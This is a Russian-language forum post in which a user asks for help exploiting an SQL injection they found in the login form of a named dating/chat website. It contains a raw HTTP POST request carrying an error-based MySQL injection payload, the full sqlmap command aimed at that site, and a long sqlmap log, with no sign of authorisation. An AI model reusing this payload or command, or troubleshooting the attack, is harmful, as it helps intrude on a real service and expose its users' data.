Xsite said:
↑
Ребят подскажите пожалуйста
нашел скулю ,не могу раскрутить мепом
POST /account/doLogin HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin:
http://chatgirl.nl
Referer:
http://chatgirl.nl/account/
Accept-Language: en-us,en;q=0.5
Host: chatgirl.nl
Cookie: __cfduid=d90bad96b9df60b454800378893a111ae14355093 09; saved_gender_id=11; saved_interest_id=11; saved_region_id=city_611225; saved_nickname=NSFTW
Accept-Encoding: gzip, deflate
Content-Length: 442
Content-Type: application/x-www-form-urlencoded
nickname=&gender_id=-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+ COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2 cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCH AR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a% 2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLA TIONS+GROUP+BY+x)a)®ion_id=city_2466&cv=Geef+hi er+een+omschrijving+van+jezelf.&coupon%5B%5D=&user name=&password=&screen_resolution=800x400&os=Windo ws&screen_size=medium
При команде
sqlmap -u "
http://chatgirl.nl/account/doLogin
" --data="nickname=&gender_id=1*®ion_id=city_2466&c v=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B %5
D=&username=&password=&screen_resolution=800x400&o s=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL
Меп редиректит на другую страницу
[19:48:08] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[19:48:14] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to '
http://chatgirl.nl/welcome/chat_closed
'. Do you want to follow? [Y/n] n
[19:48:18] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[19:48:19] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[19:48:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:48:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:48:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:48:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:49:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:49:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:49:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[19:49:30] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[19:49:32] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[19:49:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[19:49:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[19:49:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[19:49:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:51:59] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:54:21] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[19:56:29] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[19:58:33] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:00:50] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:03:04] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:04:54] [INFO] heuristics detected web page charset 'ascii'
[20:04:54] [WARNING] reflective value(s) found and filtering out
[20:04:54] [INFO] target URL appears to be UNION injectable with 40 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[20:08:10] [INFO] testing 'Generic UNION query (20) - 41 to 50 columns'
[20:17:02] [INFO] testing 'MySQL UNION query (20) - 1 to 10 columns'
[20:23:11] [INFO] testing 'MySQL UNION query (20) - 11 to 20 columns'
[20:25:14] [INFO] testing 'MySQL UNION query (20) - 21 to 30 columns'
[20:27:10] [INFO] testing 'MySQL UNION query (20) - 31 to 40 columns'
[20:29:03] [INFO] testing 'MySQL UNION query (20) - 41 to 50 columns'
[20:31:04] [WARNING] (custom) POST parameter '#1*' is not injectable
хотя скуля есть
http://hkar.ru/C3YA
В чем может быть проблема ?